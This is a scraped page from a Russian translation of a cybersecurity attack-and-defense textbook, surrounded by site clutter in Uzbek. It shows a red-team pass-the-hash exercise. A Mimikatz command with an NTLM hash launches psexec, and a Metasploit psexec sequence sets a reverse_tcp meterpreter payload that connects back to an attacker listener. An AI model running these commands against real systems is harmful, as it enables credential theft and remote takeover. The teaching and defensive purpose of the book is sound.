Интернетмагазин


sekurlsa::pth /user:yuri /domain:wdw7



Download 18,66 Mb.
Pdf ko'rish
bet121/272
Sana25.02.2022
Hajmi18,66 Mb.
#290514
1   ...   117   118   119   120   121   122   123   124   ...   272
Bog'liq
Диогенес Ю., Озкайя Э. - Кибербезопасность. Стратегии атак и обороны - 2020

sekurlsa::pth /user:yuri /domain:wdw7
/ntlm:4dbe35c3378750321e3f61945fa8c92a /run:".psexec \yuri -h cmd.exe"
Командная строка откроется в контексте этого конкретного пользователя. 
Если у этого пользователя есть права администратора, игра окончена. Атаку 
также можно осуществить из Metasploit на компьютере под управлением Kali. 
Последовательность команд показана следующим образом:
> use exploit/windows/smb/psexec
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.1.99
> set LPORT 4445
> set RHOST 192.168.1.15
> set SMBUser Yuri
> set SMBPass 4dbe35c3378750321e3f61945fa8c92a
Как только эти шаги будут выполнены, выполните команду exploit и посмот-
рите результаты (рис. 6.22).
Рис. 6.22


Резюме 
 
139
Поскольку это всего лишь упражнение для Красной команды, его цель – до-
казать, что система уязвима для атак такого типа. Обратите внимание, что 
мы не взламывали данные, а только показали, насколько уязвима вся защита 
идентификационных данных.
Другие способы взлома реквизитов доступа
Хотя можно с уверенностью сказать, что большой ущерб можно нанести с по-
мощью трех упомянутых ранее подходов, также можно утверждать, что су-
ществует еще больше способов взлома реквизитов доступа.
Красная команда может использовать облачную инфраструктуру в качестве 
цели для атаки. Утилита Nimbostratus от Андреса Рианчо – отличный ресурс 
для проведения атаки на инфраструктуру Amazon Cloud.
Будучи членом Красной команды, вы также можете столкнуться с необхо-
димостью осуществить атаки на гипервизор (VMWare или Hyper-V). Для этого 
типа атаки вы можете воспользоваться PowerMemory (
https://github.com/giMini/
PowerMemory/).

Download 18,66 Mb.

Do'stlaringiz bilan baham:
1   ...   117   118   119   120   121   122   123   124   ...   272




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish